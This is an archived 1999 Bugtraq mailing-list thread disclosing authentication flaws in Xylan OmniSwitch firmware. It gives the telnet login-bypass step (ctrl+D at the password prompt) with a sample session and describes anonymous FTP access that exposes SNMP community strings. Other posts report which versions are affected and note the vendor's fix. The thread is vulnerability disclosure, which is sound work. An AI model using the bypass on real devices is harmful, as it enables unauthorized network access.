Date: Wed, 31 Mar 1999 19:12:20 +0000 From: pmsac@TOXYN.ORG To: BUGTRAQ@netspace.org Subject: Xylan OmniSwitch "features" Sorry if this is already known. Stepped into two "features" of Xylan OmniSwitches (also works on Pizza). These switches are sold OEM to Alcatel (which just bought Xylan) and IBM. Number one: anyone can telnet to the switch and login, without knowing either user or passwod strings. No permission will be given to perform any command, which is not so bad. This could work as a DoS, because software versions until 3.1.8 (don't know about later ones) only allow one interactive session, displaying a message of "System alread in use" in other attempts. However, since you can do this DoS even without logging in (just sitting at the login prompt) it's not much of a DoS. Number two: anyone can ftp to the switch, whitout knowing either user or password strings. Everyone is allowed to read all files in the flash, and even upload files (but not remove or overwrite existing ones). Since reading all files gives access to SNMP community strings, this could be trouble, which are stored in clear text on one of the files, and writing files, well, just use your imagination. This was tested on software version 3.1.8 (the lastest I can access). Thanks to cock@p.ulh.as, which helped test the vulnerability. Have a nice day. Disclaimers: - This "feature" report was only sent here, personal option; software that's worth thounsands of dollars should be better beta tested; - I do know switches aren't generally accessible from the internet. ------------------------------------------------------------------------------- Date: Fri, 2 Apr 1999 01:41:40 +0000 From: pmsac@TOXYN.ORG To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" No, it wasn't an April Fools joke. To put things real clear, and as I said in the original post: -quote- This was tested on software version 3.1.8 (the latest I can access). -end quote- Although I said the user could login/ftp without knowing either user or password strings, I _didn't_ said it would be just a matter of entering random characters and pressing carriage return (that would be a really funny one, but hey, it's not much further from the real thing). To the folks who just wrote me some nice mail saying something as constructive as -quote- We don't think so; or: we don't think, so... -end quote- well, think again (I do have some more things to do than posting a product of my imagination to bugtraq - gee, I must have tested before I posted, what about that ? ): - copy & paste --------------------------------------------------------- [pmsac@localhost pmsac]$ telnet switch Trying www.xxx.yyy.zzz... Connected to www.xxx.yyy.zzz. Escape character is '^]'. Welcome to the Xylan OmniSwitch! Version 3.1.8 login : ajsdkal password: ********************************************************************** Xylan OmniSwitch - Copyright (c), 1994-1998 XYLAN Inc. All rights reserved. -end copy & paste ------------------------------------------------------ When you get the password prompt, just press ctrl+d (^D), the user string is arbitrary. You won't get privileges to run any command, not even the "exit" one, you have to close the connection "manually". The ftp "feature" is a little different, but, answering to -quote- I would very much appreciate an exploit or more detailed explanation of this vulnerability. We do have Omniswitches 'round these parts. This is an odd sort of "full-disclosure" posting, BW. -end quote- which was a rather polite mail, that's not the question, did I said it was a full-disclosure post ? It would be real fun, had I put it all in the open, that one of your lusers (or one of mine, for that matter), worked it's way trough all the switches... specially since this is not open source/free software (if it would, I would have contacted the author(s) first) and I could not publish a patch or a temporary way of disabling the "features". And no, we (I) don't need a thread about "full-disclosure and/or getting in touch with the author(s) first", read the disclaimers, it's a personal option. Sorry for all the ranting, thanks again to cock@p.ulh.as, which helped test the vulnerability. Have a nice day. Disclaimers: - This "feature" report was only sent here, personal option; software that's worth thousands of dollars should be better beta tested; - I do know switches aren't generally accessible from the Internet. ------------------------------------------------------------------------------- Date: Thu, 1 Apr 1999 14:31:00 -0500 From: Jeff Murphy To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" we tried this with Version 3.2.5.17 and we're able to get in. -- inserted text -- > Number one: anyone can telnet to the switch and login, without knowing > either user or passwod strings. No permission will be given to perform If I understand this, I can hit CR and get in. Just hitting CR keeps returning the login prompt, using any other character gets me to password, but CR returns login failure. > Number two: anyone can ftp to the switch, whitout knowing either user or > password strings. Nope, couldn't get in. -- end inserted text -- ------------------------------------------------------------------------------- Date: Mon, 5 Apr 1999 13:17:49 -0400 From: Jeff Murphy To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" Jeff Murphy writes: > we tried this with Version 3.2.5.17 and we're able to get in. ^^^^ i meant to type "weren't" but left out a couple letters. i.e. we can not get in using your instructions. > > -- inserted text -- > > > Number one: anyone can telnet to the switch and login, without knowing > > either user or passwod strings. No permission will be given to perform > > If I understand this, I can hit CR and get in. Just hitting CR keeps > returning the login prompt, using any other character gets me to password, > but CR returns login failure. > > > Number two: anyone can ftp to the switch, whitout knowing either user or > > password strings. > > Nope, couldn't get in. > > -- end inserted text -- ------------------------------------------------------------------------------- Date: Mon, 5 Apr 1999 13:41:52 -0500 From: Greg Hodges To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" I am unable to reproduce the telnet "feature" on 3.1.3.3(A), 3.2.5, 3.2.6.4(I), 3.2.7.12(C), and 3.4.2. Greg Hodges ------------------------------------------------------------------------------- Date: Mon, 5 Apr 1999 16:30:39 -0400 From: "Wall, Teresa" To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" unable to get into Xylan OmniSwitch running 3.4.3.28 ------------------------------------------------------------------------------- Date: Tue, 6 Apr 1999 01:20:29 -0400 From: willp2 To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" I tested this on Xylan's 3.2.5 code. I could not reproduce the bug. ------------------------------------------------------------------------------- Date: Tue, 6 Apr 1999 17:36:23 -0500 From: Chris Sterling To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" The telnet bug does work on 3.1.9 -------------------------------- Chris Sterling System Administrator EazeNet lemmy@eaze.net Office: 817-557-3038 Fax: 817-557-3468 ------------------------------------------------------------------------------- Date: Thu, 8 Apr 1999 16:18:33 +0100 From: pmsac To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" Ok, from all the posts on this thread and from some private mails: 3.2.3 is reported vulnerable to the telnet "feature". 3.2.5 is reported not vulnerable to the same "feature". Xylan has now the info on the ftp vulnerability. About the telnet "feature" they said: -quote- The "telnet" vulnerability was fixed prior to software release 3.2.6. -end quote- -- pmsac@toxyn.org ------------------------------------------------------------------------------- Date: Fri, 9 Apr 1999 11:28:02 +0100 From: Rui Pedro Bernardino To: BUGTRAQ@netspace.org Subject: Re: Xylan OmniSwitch "features" Please remember this isn't a plain "switch", considering it can run Checkpoint's fw-1 and WAN interfaces... -- Rui Pedro Bernardino Gab. Seguranca Informatica Av. Miguel Bombarda, No 4, 8o Tel. +351 1 7922200 ext. 117810 1049-058 Lisboa Fax. +351 1 7922497 Portugal Mob. +351 931 7489996